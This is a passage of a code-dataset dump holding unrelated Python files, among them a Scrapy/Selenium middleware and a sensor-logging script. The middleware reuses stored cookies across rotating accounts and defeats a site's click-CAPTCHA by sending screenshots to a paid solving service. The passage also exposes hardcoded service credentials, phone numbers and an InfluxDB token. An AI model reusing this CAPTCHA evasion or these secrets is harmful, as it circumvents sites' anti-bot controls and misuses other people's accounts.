text = \"\"\n for c in paragraph:\n for marker, style in style_markers.items():\n if c == marker:\n if text:\n yield state, text\n text = \"\"\n state = \"normal\" if state == style else style\n break\n else:\n text += c\n\n if text:\n yield state, text\n\ndef process_comments(texts):\n \"\"\"The comments field is processed specially so that blocks which are\n tagged as italic or bold (surrounded by _ or *) can be broken out into\n separate blocks and tagged as such.\n \"\"\"\n comments = []\n for paragraph in texts:\n comment = list(process_paragraph(paragraph))\n if comment:\n comments.append(comment)\n yield \"COMMENTS\", comments\n\n\ndef break_and_process_comments(text):\n paragraphs = []\n for line in text.splitlines():\n comment = list(process_paragraph(line.strip()))\n if comment:\n paragraphs.append(comment)\n return paragraphs\n\n#\n# Each processor takes a list of paragraphs and yields\n# tuples of keyword, paragraphs. This allows a single source\n# line to become more than one keyword / text. eg a title\n# which looks like this:\n# TITLE: This is a title (With a subtitle)\n# can yield:\n# TITLE, This is a title\n# SUBTITLE, With a subtitle\n#\nPROCESSORS = {\n \"TITLE\" : process_title,\n \"GOSPEL\" : process_gospel,\n \"COMMENTS\" : process_comments\n}\n\ndef process_one_file(filepath):\n items = {}\n with codecs.open(filepath, encoding=INPUT_ENCODING) as f:\n for keyword, paragraphs in parse_text(str(f.read())):\n items.update(PROCESSORS[keyword](paragraphs))\n return items\n\ndef process_one_folder(dirpath, include_subfolders=True):\n text = {}\n if include_subfolders:\n filepaths = []\n for dirname, dirnames, filenames in os.walk(dirpath):\n for filename in filenames:\n if filename.endswith(\".txt\"):\n filepaths.append(os.path.join(dirname, filename))\n else:\n filepaths = glob.glob(os.path.join(dirpath, \"*.txt\"))\n \n for filepath in sorted(filepaths):\n print(filepath)\n filename = os.path.basename(filepath)\n name, ext = os.path.splitext(filename)\n text[name] = dict(process_one_file(filepath))\n return text\n\ndef process_one_thing(path):\n if os.path.isdir(path):\n return process_one_folder(path)\n else:\n print(path)\n return process_one_file(path)\n\nif __name__ == '__main__':\n import pprint\n with codecs.open(\"parse.txt\", \"wb\", encoding=INPUT_ENCODING) as f:\n f.write(\"# -*- coding: utf-8 -*-\\n\")\n pprint.pprint(process_one_thing(*sys.argv[1:]), f)\n #~ json.dump(process_one_folder(*sys.argv[1:]), f)\n","sub_path":"src/build/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"10943479","text":"import pandas as pd\n\nfilename = 'bankloan.xls' #输入数据\ndata = pd.read_excel(filename)\nx = data.iloc[:,:8].as_matrix()\nprint(x) #将x0到x7,转化成numpy数组\ny = data.iloc[:,8].as_matrix()\nprint(y) #将第8列转化成numpy数组\n\n\nfrom sklearn.linear_model import RandomizedLogisticRegression as RLR\n\n'''\nrlr = RLR()\nrlr.fit(x, y) \nrlr.get_support()\n\n\nprint(u'')\nprint(u'' % ','.join(data.columns[rlr.get_support()]))\nx = data[data.columns[rlr.get_support()]].as_matrix() \n\nlr = LR() \nlr.fit(x, y) \nprint(u'')\nprint(u'' % lr.score(x, y)) \n'''","sub_path":"第五章 挖掘建模/1,分类与预测/logistic模型的建立.py","file_name":"logistic模型的建立.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"407547750","text":"\n\nimport time\nimport numpy as np\nfrom multiprocessing.dummy import Pool\n\n\ndef run(name):\n a = np.random.randint(0, 10)\n print('Process {} runing, this needs {} seconds '.format(name, a))\n time.sleep(a)\n print('Process {} running end, The return value is {}'.format(name, a))\n return (a)\n\n\nif __name__ == '__main__':\n p = Pool(4)\n res = []\n for i in range(8):\n res_temp = p.apply_async(run, args=(i,))\n res.append(res_temp)\n p.close()\n p.join()\n print('主线程')\n for res_temp in res:\n print(res_temp.get())\n","sub_path":"_book/code/Python基础/多进程.py","file_name":"多进程.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161036608","text":"locate = lambda x, n: x + (4 * n - 4) - 1 # locate the leftest and the most top value in n*n matrix\r\ncalculate_sum = lambda x, n: sum(range(x, x - 3 * (n - 1) - 1, - (n - 1))) # calculate the sum of four corners in n*n matrix\r\nx0 = 2\r\ns = 1\r\nn = 1001\r\nfor k in range(3, n + 1, 2):\r\n x1 = locate(x0, k)\r\n s += calculate_sum(x1, k)\r\n x0 = x1 + 1\r\nprint(s)","sub_path":"question28.py","file_name":"question28.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"253780729","text":"#!/usr/bin/env python\n\n\"\"\"\nAuthor: Shashank Kotyan\nEmail: shashankkotyan@gmail.com\n\"\"\"\n\nimport os, sys, warnings\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nwarnings.filterwarnings('ignore')\n\nimport argparse, glob, pickle, time, GPUtil, numpy as np \n\nfrom scipy.cluster.vq import whiten as normalise\nfrom multiprocessing.managers import BaseManager\n\nimport build\nfrom population import Population\nfrom worker import Worker\nfrom process import Process\n\n\nclass NeuroEvolution:\n\n\n def __init__(self, args):\n \n self.population_size = args.population_size\n self.population_dir = args.population_dir\n self.num_mutations = args.num_mutations\n self.number_of_child = args.num_mutated_child\n \n self.gen = -1\n self.ind_counter = 0\n\n if not os.path.exists(self.population_dir): os.makedirs(self.population_dir)\n if not os.path.exists(args.log_dir): os.makedirs(args.log_dir)\n\n BaseManager.register('Population', Population)\n manager = BaseManager()\n manager.start()\n \n self.population = manager.Population()\n self.population.set(args)\n \n self.worker = Worker(args, build.load_data(args.dataset))\n\n \n def parallel_run(self, type_create, args):\n\n start = False\n\n while not start:\n\n for deviceID in range(7):\n\n if deviceID in self.jobs:\n\n if not self.jobs[deviceID].is_alive():\n\n self.jobs[deviceID].close() \n if self.jobs[deviceID].exception is not None: raise Exception(f\"{self.jobs[deviceID].exception[0]}, {self.jobs[deviceID].exception[1]}\")\n finished_job = self.jobs.pop(deviceID, None)\n\n with open(\"num_workers.txt\", \"r\") as f: num_workers = int(f.read())\n\n deviceIDs = GPUtil.getAvailable(order='memory', limit=7, maxLoad=1.1, maxMemory=0.5)\n\n alive = -1\n\n if len(deviceIDs) != 0:\n\n for deviceID in deviceIDs:\n\n if deviceID not in self.jobs:\n\n alive = deviceID\n break\n\n if len(self.jobs) < num_workers and alive > -1:\n\n print(f\"GPU {alive} running {self.ind_counter}\")\n\n if type_create == 0: target=self.worker.create_parent\n else: target=self.worker.create_child\n\n start = True\n\n args[0] = alive\n job = Process(target=target, args=tuple(args))\n self.jobs[alive] = job \n job.start()\n\n else:\n\n time.sleep(0.1)\n\n \n def run(self):\n \n found = False\n\n print(f\"Searching for previous geneartions\")\n population = sorted(glob.glob(f\"{self.population_dir}/*/*/alive.txt\"))\n \n if len(population) > 0: \n \n if len(population) == self.population_size or len(population) == self.population_size*(self.number_of_child+1): \n\n found = True\n \n for individual in population:\n\n self.gen = max(self.gen, int(individual.split('/')[1]))\n self.ind_counter = max(self.ind_counter, int(individual.split('/')[2]))\n \n if len(population) == self.population_size*(self.number_of_child+1): self.evolve_ras()\n\n print(f\"Found Last Generation {self.gen} with last individual {self.ind_counter}\")\n\n else: raise Exception(f\"Corrupted Files, please delete the files in {self.population_dir}. Maybe the files were in between the evolution\")\n\n else: found = False\n\n if found == False: self.create_initial_population()\n\n self.evolve()\n\n \n def create_initial_population(self):\n \n print(f\"Did Not Found Any Last Generation\\n\")\n\n self.gen += 1\n\n generation_directory = f\"{self.population_dir}/{self.gen}/\"\n if not os.path.exists(generation_directory): os.makedirs(generation_directory)\n\n self.jobs = {}\n \n for _ in range(self.population_size): \n self.ind_counter += 1\n \n individual = f\"{self.population_dir}/{self.gen}/{self.ind_counter}\"\n if not os.path.exists(individual): os.makedirs(individual)\n\n self.create_lineage(individual)\n self.parallel_run(0, [0, individual, self.population, self.store_individual, self.gen])\n \n for deviceID in self.jobs:\n self.jobs[deviceID].join()\n if self.jobs[deviceID].exception is not None: raise Exception(f\"{self.jobs[deviceID].exception[0]}, {self.jobs[deviceID].exception[1]}\")\n \n self.population.write_log(f\"\\n\") \n self.population.save_populations(f\"{self.population_dir}/{self.gen}\")\n\n \n def evolve_ras(self):\n\n population = sorted(glob.glob(f\"{self.population_dir}/*/*/alive.txt\"))\n assert len(population) == self.population_size\n\n self.population.read_populations(f\"{self.population_dir}/{self.gen}\")\n\n self.gen += 1\n\n generation_directory = f\"{self.population_dir}/{self.gen}/\"\n if not os.path.exists(generation_directory): os.makedirs(generation_directory)\n\n cluster_population = {'individual':[], 'dna':[], 'metrics':[], 'spectrum': []}\n \n for i, individual in enumerate(population):\n\n individual = individual.split('/alive.txt')[0]\n dna, metrics = self.read_individual(individual)\n\n cluster_population['individual'] += [individual]\n cluster_population['dna'] += [dna]\n cluster_population['metrics'] += [metrics]\n cluster_population['spectrum'] += [dna['graph'].graph['spectrum']]\n\n child_individuals = []\n \n self.jobs = {}\n \n for parent_individual in population * self.number_of_child: \n\n self.ind_counter += 1\n\n parent_individual = parent_individual.split('/alive.txt')[0] \n parent_dna, parent_metrics = self.read_individual(parent_individual)\n\n child_individual = f\"{self.population_dir}/{self.gen}/{self.ind_counter}\"\n if not os.path.exists(child_individual): os.makedirs(child_individual)\n\n child_individuals += [child_individual]\n\n self.store_lineage(child_individual, parent_individual)\n self.parallel_run(1, [0, parent_dna, self.num_mutations, child_individual, self.population, self.store_individual, self.gen])\n\n for deviceID in self.jobs:\n\n self.jobs[deviceID].join()\n if self.jobs[deviceID].exception is not None: raise Exception(f\"{self.jobs[deviceID].exception[0]}, {self.jobs[deviceID].exception[1]}\")\n \n for child_individual in child_individuals: \n\n child_dna, child_metrics = self.read_individual(child_individual)\n child_spectrum = child_dna['graph'].graph['spectrum']\n\n normalisation_spectrum = normalise(cluster_population['spectrum'] + [child_spectrum])\n distance = [np.linalg.norm(x-normalisation_spectrum[-1]) for x in normalisation_spectrum[:-1]]\n closest_cluster_index = distance.index(min(distance))\n\n if cluster_population['metrics'][closest_cluster_index]['fitness'] < child_metrics['fitness']:\n \n self.population.write_log(f\"--> Worker changed cluster {closest_cluster_index} head {cluster_population['individual'][closest_cluster_index].split('/')[2]} of fitness {cluster_population['metrics'][closest_cluster_index]['fitness']:.2f} to {child_individual.split('/')[2]} of fitness {child_metrics['fitness']:.2f}\\n\")\n\n dead_individual_dir = cluster_population['individual'][closest_cluster_index]\n\n os.remove(f\"{dead_individual_dir}/alive.txt\")\n open(f\"{dead_individual_dir}/dead_{self.gen}.txt\", 'w').close()\n\n cluster_population['individual'][closest_cluster_index] = [child_individual]\n cluster_population['dna'][closest_cluster_index] = [child_dna]\n cluster_population['metrics'][closest_cluster_index] = [child_metrics]\n cluster_population['spectrum'] [closest_cluster_index] = [child_spectrum]\n\n else:\n \n self.population.write_log(f\"--> Worker retained cluster {closest_cluster_index} head {cluster_population['individual'][closest_cluster_index].split('/')[2]} of fitness {cluster_population['metrics'][closest_cluster_index]['fitness']:.2f} over {child_individual.split('/')[2]} of fitness {child_metrics['fitness']:.2f}\\n\") \n \n dead_individual_dir = child_individual\n\n os.remove(f\"{dead_individual_dir}/alive.txt\")\n open(f\"{dead_individual_dir}/dead_{self.gen}.txt\", 'w').close()\n\n self.population.write_log(f\"\\n\") \n self.population.clean_populations()\n\n for pop in sorted(glob.glob(f\"{self.population_dir}/*/*/alive.txt\")):\n\n dna, metrics = self.read_individual(pop.split('/alive.txt')[0])\n self.population.update_populations(dna)\n\n self.population.save_populations(f\"{self.population_dir}/{self.gen}\")\n \n\n def evolve(self):\n while True:\n self.evolve_ras() \n\n \n def read_individual(self, individual):\n with open(f\"{individual}/dna.pkl\", 'rb') as dna_file: dna = pickle.load(dna_file)\n with open(f\"{individual}/metrics.pkl\", 'rb') as metrics_file: metrics = pickle.load(metrics_file)\n return dna, metrics\n\n \n def store_individual(self, individual, dna, metrics, mutations=None): \n with open(f\"{individual}/dna.pkl\", 'wb') as dna_file: pickle.dump(dna, dna_file, pickle.HIGHEST_PROTOCOL)\n with open(f\"{individual}/metrics.pkl\", 'wb') as metrics_file: pickle.dump(metrics, metrics_file, pickle.HIGHEST_PROTOCOL)\n if mutations is not None: \n with open(f\"{individual}/mutations.pkl\", 'wb') as mutations_file: pickle.dump(mutations, mutations_file, pickle.HIGHEST_PROTOCOL)\n\n \n def store_lineage(self, child_individual, parent_individual): \n with open(f\"{parent_individual}/lineage.pkl\", 'rb') as lineage_file: lineage = pickle.load(lineage_file)\n lineage += [parent_individual.split('/')[2]]\n with open(f\"{child_individual}/lineage.pkl\", 'wb') as lineage_file: pickle.dump(lineage, lineage_file, pickle.HIGHEST_PROTOCOL)\n\n \n def create_lineage(self, individual): \n with open(f\"{individual}/lineage.pkl\", 'wb') as lineage_file: pickle.dump([individual.split('/')[2]], lineage_file, pickle.HIGHEST_PROTOCOL)\n\n \ndef to_bool(arg_bool):\n\n if arg_bool in ('True', 'true', 'T', 't', '1', 'Y', 'y'): return True\n elif arg_bool in ('False', 'false', 'F', 'f', '0', 'N', 'n'): return False\n else: raise argparse.ArgumentTypeError('Boolean value expected.')\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description=('Robust Architecture Search'))\n\n # Use for creating and mutating individual of population\n parser.add_argument(\"--use_cycles\", \"-cy\", action=\"store_false\", help=\"if not to use cycles in populations\")\n parser.add_argument(\"--use_adaptive_mutations\", \"-am\", action=\"store_true\", help=\"if use adaptive mutations\")\n parser.add_argument(\"--use_random_params\", \"-rp\", action=\"store_true\", help=\"if use random params\")\n parser.add_argument(\"--use_non_squares\", \"-sq\", action=\"store_true\", help=\"if use non-square kernels and strides\")\n \n # Use for training an individual\n parser.add_argument(\"--use_augmentation\", \"-au\", action=\"store_true\", help=\"if use augmented training\")\n parser.add_argument(\"--use_limited_data\", \"-ld\", action=\"store_true\", help=\"if use limited data for training\")\n parser.add_argument(\"--dataset\", \"-d\", default=2, type=int, help=\"Dataset to be used for training\")\n parser.add_argument(\"--epochs\", \"-e\", default=50, type=int, help=\"Number of epochs to be used for a single individual\")\n \n # Use for type of evolving generations\n parser.add_argument(\"--num_mutations\", \"-m\", default=5, type=int, help=\"Number of mutations an individual undergoes\")\n parser.add_argument(\"--num_mutated_child\", \"-n\", default=2, type=int, help=\"Number of mutated individuals for a single parent\")\n parser.add_argument(\"--population_size\", \"-p\", default=25, type=int, help=\"Number of individuals in the population\")\n \n # Use for changing directories\n parser.add_argument(\"--population_dir\", \"-dir\", default=\"population\", type=str, help=\"Directory for storing all individuals\")\n parser.add_argument(\"--log_dir\", \"-log\", default=\"logs\", type=str, help=\"Directory for logs\")\n \n # Use for dry run\n parser.add_argument(\"--test\", \"-test\", action=\"store_false\", help=\"Option for Dry Run to test, if the code runs. Please also check ./-log_dir-/exceptions.log too.\")\n \n args = parser.parse_args()\n \n print(args)\n \n NeuroEvolution(args).run()\n \n","sub_path":"run_evolution.py","file_name":"run_evolution.py","file_ext":"py","file_size_in_byte":13604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"41115464","text":"from typing import Any, AsyncGenerator, Sequence, cast\n\nimport graphql as _graphql\nfrom graphql import ExecutionResult, GraphQLError, GraphQLSchema, parse\nfrom graphql.execution import Middleware\nfrom graphql.validation.rules import RuleType\n\nfrom .format_errors import format_error\nfrom .types import ErrorFormatter, GraphQLResult, SubscriptionResult\n\n\nasync def graphql(\n schema: GraphQLSchema,\n data: Any,\n *,\n root_value: Any = None,\n context_value: Any = None,\n debug: bool = False,\n validation_rules=None,\n error_formatter: ErrorFormatter = format_error,\n middleware: Middleware = None,\n **kwargs,\n) -> GraphQLResult:\n try:\n validate_data(data)\n query, variables, operation_name = (\n data[\"query\"],\n data.get(\"variables\"),\n data.get(\"operationName\"),\n )\n\n if validation_rules:\n errors = run_custom_validation(schema, query, validation_rules)\n if errors:\n return handle_graphql_errors(\n errors, error_formatter=error_formatter, debug=debug\n )\n\n result = await _graphql.graphql(\n schema,\n query,\n root_value=root_value,\n context_value=context_value,\n variable_values=variables,\n operation_name=operation_name,\n middleware=middleware,\n **kwargs,\n )\n except GraphQLError as error:\n return handle_graphql_errors(\n [error], error_formatter=error_formatter, debug=debug\n )\n else:\n return handle_query_result(result, error_formatter=error_formatter, debug=debug)\n\n\ndef graphql_sync(\n schema: GraphQLSchema,\n data: Any,\n *,\n root_value: Any = None,\n context_value: Any = None,\n debug: bool = False,\n validation_rules=None,\n error_formatter: ErrorFormatter = format_error,\n middleware: Middleware = None,\n **kwargs,\n) -> GraphQLResult:\n try:\n validate_data(data)\n query, variables, operation_name = (\n data[\"query\"],\n data.get(\"variables\"),\n data.get(\"operationName\"),\n )\n\n if validation_rules:\n errors = run_custom_validation(schema, query, validation_rules)\n if errors:\n return handle_graphql_errors(\n errors, error_formatter=error_formatter, debug=debug\n )\n\n result = _graphql.graphql_sync(\n schema,\n query,\n root_value=root_value,\n context_value=context_value,\n variable_values=variables,\n operation_name=operation_name,\n middleware=middleware,\n **kwargs,\n )\n except GraphQLError as error:\n return handle_graphql_errors(\n [error], error_formatter=error_formatter, debug=debug\n )\n else:\n return handle_query_result(result, error_formatter=error_formatter, debug=debug)\n\n\nasync def subscribe( # pylint: disable=too-complex\n schema: GraphQLSchema,\n data: Any,\n *,\n root_value: Any = None,\n context_value: Any = None,\n debug: bool = False,\n validation_rules=None,\n error_formatter: ErrorFormatter = format_error,\n **kwargs,\n) -> SubscriptionResult:\n try:\n validate_data(data)\n query, variables, operation_name = (\n data[\"query\"],\n data.get(\"variables\"),\n data.get(\"operationName\"),\n )\n\n if validation_rules:\n errors = run_custom_validation(schema, query, validation_rules)\n if errors:\n return False, [error_formatter(error, debug) for error in errors]\n\n document = parse(query)\n result = await _graphql.subscribe(\n schema,\n document,\n root_value=root_value,\n context_value=context_value,\n variable_values=variables,\n operation_name=operation_name,\n **kwargs,\n )\n except GraphQLError as error:\n return False, [error_formatter(error, debug)]\n else:\n if isinstance(result, ExecutionResult):\n return False, [error_formatter(error, debug) for error in result.errors]\n return True, cast(AsyncGenerator, result)\n\n\ndef run_custom_validation(\n schema: GraphQLSchema, query: str, rules: Sequence[RuleType]\n) -> Sequence[GraphQLError]:\n try:\n document_ast = parse(query)\n except: # pylint: disable=bare-except\n # Query does not validate\n return []\n else:\n return _graphql.validate(schema, document_ast, rules)\n\n\ndef handle_query_result(\n result, *, error_formatter=format_error, debug=False\n) -> GraphQLResult:\n response = {\"data\": result.data}\n if result.errors:\n response[\"errors\"] = [error_formatter(error, debug) for error in result.errors]\n return True, response\n\n\ndef handle_graphql_errors(\n errors: Sequence[GraphQLError], *, error_formatter, debug\n) -> GraphQLResult:\n return False, {\"errors\": [error_formatter(error, debug) for error in errors]}\n\n\ndef validate_data(data: dict) -> None:\n if not isinstance(data, dict):\n raise GraphQLError(\"Operation data should be a JSON object\")\n\n validate_query_body(data.get(\"query\"))\n validate_variables(data.get(\"variables\"))\n validate_operation_name(data.get(\"operationName\"))\n\n\ndef validate_query_body(query) -> None:\n if not query or not isinstance(query, str):\n raise GraphQLError(\"The query must be a string.\")\n\n\ndef validate_variables(variables) -> None:\n if variables is not None and not isinstance(variables, dict):\n raise GraphQLError(\"Query variables must be a null or an object.\")\n\n\ndef validate_operation_name(operation_name) -> None:\n if operation_name is not None and not isinstance(operation_name, str):\n raise GraphQLError('\"%s\" is not a valid operation name.' % operation_name)\n","sub_path":"ariadne/graphql.py","file_name":"graphql.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"121187504","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nfrom scrapy import signals\nimport selenium\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium import webdriver\nfrom logging import getLogger\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom scrapy.http import HtmlResponse\nfrom selenium.common.exceptions import TimeoutException\nfrom io import BytesIO\nfrom PIL import Image\nimport time\nfrom selenium.webdriver import ActionChains\nfrom ssbase.chaojiying import Chaojiying\nfrom ssbase.usecookie import getcookie1, getcookie2,getcookie4,getcookie3\nimport random\nimport redis\nimport json\nimport os\n\nCHAOJIYING_USERNAME = '15309080101'\nCHAOJIYING_PASSWORD = '271255542'\nCHAOJIYING_SOFT_ID = 899231\nCHAOJIYING_KIND = 9004\n\nusernames = ['13880777745','17313135669','18980755350']\n\nclass SsbaseSpiderMiddleware(object):\n # Not all methods need to be defined. If a method is not defined,\n # scrapy acts as if the spider middleware does not modify the\n # passed objects.\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n return s\n\n def process_spider_input(self, response, spider):\n # Called for each response that goes through the spider\n # middleware and into the spider.\n\n # Should return None or raise an exception.\n return None\n\n def process_spider_output(self, response, result, spider):\n # Called with the results returned from the Spider, after\n # it has processed the response.\n\n # Must return an iterable of Request, dict or Item objects.\n for i in result:\n yield i\n\n def process_spider_exception(self, response, exception, spider):\n # Called when a spider or process_spider_input() method\n # (from other spider middleware) raises an exception.\n\n # Should return either None or an iterable of Response, dict\n # or Item objects.\n pass\n\n def process_start_requests(self, start_requests, spider):\n # Called with the start requests of the spider, and works\n # similarly to the process_spider_output() method, except\n # that it doesn’t have a response associated.\n\n # Must return only requests (not items).\n for r in start_requests:\n yield r\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n\nclass SsbaseDownloaderMiddleware(object):\n\n def __init__(self):\n self.logger = getLogger(__name__)\n self.options = Options()\n self.options.add_argument('-headless')\n self.browser = webdriver.Firefox(firefox_options=self.options)\n self.wait = WebDriverWait(self.browser,10)\n # Not all methods need to be defined. If a method is not defined,\n # scrapy acts as if the downloader middleware does not modify the\n # passed objects.\n def __del__(self):\n self.browser.quit()\n\n @classmethod\n def from_crawler(cls, crawler):\n # This method is used by Scrapy to create your spiders.\n s = cls()\n crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)\n crawler.signals.connect(s.spider_closed, signal=signals.spider_closed)\n return s\n\n def process_request(self, request, spider):\n rds = redis.StrictRedis(host='192.168.1.32', port=6379, decode_responses=True)\n self.logger.debug('Selenium is Starting')\n try:\n users = random.choice(usernames)\n self.browser.get(request.url)\n self.browser.delete_all_cookies()\n for i in range(1, 16):\n c = rds.hget(users, 'cookies{}'.format(i))\n self.browser.add_cookie(json.loads(c))\n self.browser.get(request.url)\n # print(self.browser.page_source)\n return HtmlResponse(url=request.url, body=self.browser.page_source, request=request, encoding='utf-8',\n status=200)\n except TimeoutException:\n return HtmlResponse(url=request.url, status=500, request=request)\n # Called for each request that goes through the downloader\n # middleware.\n\n # Must either:\n # - return None: continue processing this request\n # - or return a Response object\n # - or return a Request object\n # - or raise IgnoreRequest: process_exception() methods of\n # installed downloader middleware will be called\n # return None\n\n def process_response(self, request, response, spider):\n nowurl = self.browser.current_url\n if nowurl[8:17] == 'antirobot':\n self.run_verify()\n return response\n\n else:\n return response\n # Called with the response returned from the downloader.\n\n # Must either;\n # - return a Response object\n # - return a Request object\n # - or raise IgnoreRequest\n # return response\n\n def process_exception(self, request, exception, spider):\n # Called when a download handler or a process_request()\n # (from other downloader middleware) raises an exception.\n\n # Must either:\n # - return None: continue processing this exception\n # - return a Response object: stops process_exception() chain\n # - return a Request object: stops process_exception() chain\n pass\n\n def spider_opened(self, spider):\n spider.logger.info('Spider opened: %s' % spider.name)\n\n def spider_closed(self, spider):\n self.browser.close()\n self.browser.quit()\n os.system('taskkill /im geckodriver.exe /F')\n os.system('taskkill /im firefox.exe /F')\n\n def get_touch_element(self):\n element = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'new-box94')))\n return element\n\n def get_position(self):\n element = self.get_touch_element()\n time.sleep(2)\n location = element.location\n size = element.size\n print(location, size)\n top, bottom, left, right = location['y'], location['y'] + size['height'], location['x'], location['x'] + size['width']\n return (top, bottom, left, right)\n\n def get_screenshot(self):\n screenshot = self.browser.get_screenshot_as_png()\n self.browser.get_screenshot_as_file('C:\\\\Users\\Administrator\\Desktop\\prdabnormal.png')\n screenshot = Image.open(BytesIO(screenshot))\n return screenshot\n\n def get_touch_image(self, name='captcha.png'):\n top, bottom, left, right = self.get_position()\n screenshot = self.get_screenshot()\n captcha = screenshot.crop((left, top, right, bottom))\n # 截图位置必须为左上右下\n captcha.save(name)\n return captcha\n\n def get_points(self, captcha_result):\n try:\n groups = captcha_result.get('pic_str').split('|')\n locations = [[int(number) for number in group.split(',')] for group in groups]\n return locations\n except ValueError:\n x = [[1, 1], [2, 2]]\n return x\n\n def click_words(self, locations):\n for location in locations:\n ActionChains(self.browser).move_to_element_with_offset(self.get_touch_element(), location[0],\n location[1]).click().perform()\n time.sleep(1)\n\n def click_verify(self):\n button = self.wait.until(EC.element_to_be_clickable((By.ID, 'submitie')))\n button.click()\n\n def run_verify(self):\n chaojiying = Chaojiying(CHAOJIYING_USERNAME, CHAOJIYING_PASSWORD, CHAOJIYING_SOFT_ID)\n image = self.get_touch_image()\n bytes_array = BytesIO()\n image.save(bytes_array, format='PNG')\n result = chaojiying.post_pic(bytes_array.getvalue(), CHAOJIYING_KIND)\n locations = self.get_points(result)\n self.click_words(locations)\n self.click_verify()\n","sub_path":"build/lib/ssbase/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":8257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566123654","text":"# import leapyear\n# ano = int(input('Escolha um ano: '))\n# print(f'E ano e bissexto: {leapyear.get(ano)}')\n\nfrom datetime import date\nano = int(input('Que ano quer analisar?(Digite 0 se for o atual) '))\nif ano == 0:\n ano = date.today().year\nif ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:\n print(f'O ano {ano}, é Bissexto.')\nelse:\n print(f'O ano {ano}, Não e Bissexto.')\n","sub_path":"ex032.py","file_name":"ex032.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5885945","text":"import urllib.request, json\n\n# Let's grab the lineage of the feed I want\nchicago = urllib.request.urlopen('http://bikeshare-research.org/api/v1/categories/data/lineages/9/')\nchicago_feeds = chicago.read().decode(\"utf8\")\n# [{\"rid\":\"7\",\"bssid\":\"chicago\",\"feedname\":\"Divvy JSON\",\"feedurl\":\"http://www.divvybikes.com/stations/json\",\"feedurl2\":\"\",\"format\":\"json\",\"keyreq\":\"no\",\"parsername\":null},\n# {\"rid\":\"9\",\"bssid\":\"chicago\",\"feedname\":\"Divvy JSON\",\"feedurl\":\"http://www.divvybikes.com/stations/json\",\"feedurl2\":\"\",\"format\":\"json\",\"keyreq\":\"no\",\"parsername\":\"motivate\"}]\n# We see that the parsername was specified in the last update.\n\n# let's use the last update\nchicago_feeds_json = json.loads(chicago_feeds)\nchicago_data_feed = chicago_feeds_json[len(chicago_feeds_json)-1]\n\n# Get parsers to easily retrieve data by cloning the BSR_parsers repository locally:\n# git clone https://github.com/serialc/BSR_parsers.git\n\n# load the python parser\nfrom bsrp import BSRParser\n\n# Example 1: Chicago and method chaining\n# create instance of parser with data feed details\nparser = BSRParser(chicago_data_feed)\n\n# retrieving will return False or, if successfull, the parser object (self)\nparser.retrieve()\n\n# save cleaned data locally according to the default schema (fullset)\nparser.save('')\n\n# save the raw data if you wish\nparser.save_raw('')\n\n# retrieve the data in array form, perhaps to insert into DB\ndata_array = parser.get_data_array()\n\n# or, since most of these methods return the object/self, do it all in one line\ndata_array = parser.retrieve().save('').save_raw('').get_data_array()\n\n# Example 2: Lyon and data feed API keys\n# For lyon we have already identified the feed we would like:\nlyon = urllib2.urlopen('http://bikeshare-research.org/api/v1/categories/data/records/10')\nlyon_data_feed = json.loads(lyon.read())[0]\n\nparser = BSRParser(lyon_data_feed)\n# we don't need to explicitly call retrieve(), saving will do so if necessary\nparser.set_apikey('YOUR JCDECAUX API KEY').retrieve().save_raw('').save('')\n# data is saved locally, done\n\n# You can convert the UTC time to the local timezone using the timezome attribute in '/systems/lyon/categories/base/'\n# Add to your DB\n","sub_path":"parsers/pyBSRP/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"635662273","text":"#!/usr/bin/python3\nfrom mitemp.mitemp_bt.mitemp_bt_poller import MiTempBtPoller\nfrom mitemp.mitemp_bt.mitemp_bt_poller import MI_TEMPERATURE, MI_HUMIDITY, MI_BATTERY\nfrom btlewrap.bluepy import BluepyBackend\nfrom bluepy.btle import BTLEException\nimport traceback\nimport configparser\nimport os\nimport json\nimport datetime\n\nfrom datetime import datetime\nfrom influxdb_client import InfluxDBClient, Point, WritePrecision\nfrom influxdb_client.client.write_api import SYNCHRONOUS\n\nworkdir = os.path.dirname(os.path.realpath(__file__))\nconfig = configparser.ConfigParser()\nconfig.read(\"{0}/devices.ini\".format(workdir))\ndevices = config.sections()\n\n\n\n#INFLUXDB\nurl = \"https://westeurope-1.azure.cloud2.influxdata.com\"\ntoken = \"FS8hSyUmBlhOuQOpZVFqfs5dnFDEOBmUFoZLsQ1K296U55Xf9gJhVT1cXPA1G-83x4074S5QpoeLgroWKtlQ4g==\"\norg = \"1f225e11cad1e4dd\"\nbucket = 